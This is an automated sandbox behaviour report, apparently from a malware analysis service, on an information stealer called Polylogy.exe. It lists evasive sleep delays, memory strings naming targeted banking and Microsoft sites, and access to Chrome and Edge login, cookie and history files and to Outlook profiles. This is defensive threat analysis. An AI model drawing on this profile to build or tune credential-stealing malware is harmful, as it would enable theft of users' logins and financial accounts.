            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596234Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596016Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595891Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595766Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595547Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595437Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595219Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595109Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595000Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 594890Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 594781Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 594672Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 594562Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 594453Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeWindow / User API: threadDelayed 1137Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeWindow / User API: threadDelayed 8713Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj3433.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Polylogy.exeAPI coverage: 1.7 %
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -22136092888451448s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 2272Thread sleep count: 1137 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 2272Thread sleep count: 8713 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -599344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -598891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -598766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -598656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -598498s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -598250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -598141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -598016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -597906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -597797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -597687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -597578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -597469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -597359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -597250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -597141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -597016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -596891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -596781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -596672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -596562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -596453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -596344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -596234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -596125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -596016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -595891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -595766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -595656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -595547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -595437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -595328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -595219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -595109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -595000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -594890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -594781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -594672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -594562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912Thread sleep time: -594453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405731
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_004061E5 FindFirstFileW,FindClose,0_2_004061E5
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_00402706 FindFirstFileW,4_2_00402706
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405731
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_004061E5 FindFirstFileW,FindClose,4_2_004061E5
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598766Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598498Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598141Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597797Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597687Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597578Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597250Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597141Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597016Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596891Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596234Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596016Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595891Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595766Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595547Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595437Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595219Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595109Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 595000Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 594890Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 594781Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 594672Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 594562Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 594453Jump to behavior
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4519186708.0000000005458000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4519186708.00000000054B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd50c1797da015<
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: C:\Users\user\Desktop\Polylogy.exeAPI call chain: ExitProcess graph end nodegraph_0-4669
            Source: C:\Users\user\Desktop\Polylogy.exeAPI call chain: ExitProcess graph end nodegraph_0-4668
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040620C
            Source: C:\Users\user\Desktop\Polylogy.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess created: C:\Users\user\Desktop\Polylogy.exe "C:\Users\user\Desktop\Polylogy.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeQueries volume information: C:\Users\user\Desktop\Polylogy.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_00405EC4 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405EC4
            Source: C:\Users\user\Desktop\Polylogy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Polylogy.exe PID: 5568, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Polylogy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: Process Memory Space: Polylogy.exe PID: 5568, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Polylogy.exe PID: 5568, type: MEMORYSTR
